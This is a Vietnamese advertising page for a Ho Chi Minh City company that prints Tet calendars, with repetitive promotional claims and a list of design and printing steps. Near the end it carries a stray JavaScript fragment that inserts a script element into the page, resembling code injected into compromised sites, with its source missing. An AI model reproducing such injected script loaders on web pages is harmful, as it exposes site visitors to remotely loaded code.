In ấn - thiết kế

Công ty in lịch tết tại quận 12

Công ty in lịch tết tại quận 12

Công ty in lịch tết tại quận 12

5 (100%) 2 votes


Cứ vào mỗi dịp cuối năm, các công ty đều lên kế hoạch in lịch Tết 2020 để làm món quà khen thưởng thành tích thi dua cho nhân viên hoặc tri ân khách hàng thân thiết. Món quà tinh thần này gửi gắm lời cảm ơn cũng như lời động viên tinh thần đoàn kết, ghi nhớ mối quan hệ hợp tác kinh doanh tốt đẹp và đang dần trở thành hoạt động văn hóa truyền thống của doanh nghiệp Việt.

Mẫu lịch bloc 2017 chủ đề hoa Mẫu lịch bloc 2020 chủ đề hoa

Công ty in lịch tết tại quận 12

In lịch tết 2020 giá rẻ

Bạn đang phân vâng chọn lựa đơn vị in lịch tết và so sánh giá nhiều nơi để có được sản phẩm lịch 2020 tốt nhất?

Công ty in lịch tết Tân Phương Nam với tuổi đời và kinh nghiệm in ấn hàng đầu tại TPHCM xin cam đoan, lịch tết 2020 của chúng tôi về giá cả luôn cạnh tranh đi đôi với chất lượng. Nhiều khách hàng lo lắng và nghi ngờ đặt câu hỏi rằng: Giá rẻ làm sao có thể chất lượng được? Chúng tôi xin trả lời: “Đó là vì Tân Phương Nam sử dụng máy móc công nghệ in ấn của châu Âu và chất liệu giấy, mực in được nhập trực tiếp nên giá sản xuất lịch tết rẻ nhất.

Thiết kế lịch tết lịch tết quận 12

Dịch vụ uy tín và giá rẻ nên đã có rất nhiều doanh nghiệp liên hệ để tư vấn thiết kế mẫu lịch độc quyền cho họ. Chúng tôi luôn hiểu rằng: với mỗi doanh nghiệp, bộ lịch tết tặng cho khách hàng không chỉ là món quà thể hiện sự tri ân mà còn là ấn phẩm thể hiện rõ dấu ấn riêng của doanh nghiệp, nói lên được thương hiệu của mình. Đội ngũ nhân viên của chúng tôi làm việc đầy sáng tạo để cho ra những mẫu lịch độc đáo từ nội dung, bố cục và ngay cả ý tưởng về màu sắc, mỗi một sản phẩm lịch 2020 chúng tôi cung cấp là một sản phẩm của riêng bạn, không hề có mặt trên thị trường.

Mẫu lịch tết 365 món ăn dinh dưỡng

Qui trình thiết kế lịch tết – in lịch 2020 của chúng tôi:

– Quy trình thiết kế lịch tết:

1. Khải sát tìm hiểu insight khách hàng

2. Lên Concerp ý tưởng

3. Lên Drap bản vẽ phác thảo

4. Thiết kế bản chính thức

5. Duyệt thiết kế Final

– Quy trình In lịch tết 2020:

1.  In Dropt mẫu sau khi duyệt thiết kế Final

2.  Cấp giấy phép xuất bản từ sở văn hoá

3.  In hàng loạt thành phẩm

4.  Giao hàng theo thời gian dự kiến.

Chúng tôi nhận in lịch 2020 số lượng lớn giá sỉ và chiết khấu cao

Xem mẫu lịch tết 2020 tại quận 12

 

Mẫu lịch tết

Mẫu lịch tết

Liên hệ với chúng tôi để được tư vấn thiết kế lịch 2020 ĐẸP – ĐỘC – LẠ cho thương hiệu của bạn.

Bạn đang muốn in lịch tết 2020 nhưng hiện nay công ty in ấn tại TPHCM có rất nhiều tuy nhiên, công ty in lịch tết chuyên nghiệp thì không nhiều. Vì thế, bạn cần lựa chọn một đối tác chuyên nghiệp và uy tín để làm việc và đặt hàng in lịch tết. Hãy liên hệ ngay tại lịch tết Tân Phương Nam.

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Posted in: in lịch tết 2017

Leave a Comment (0) ↓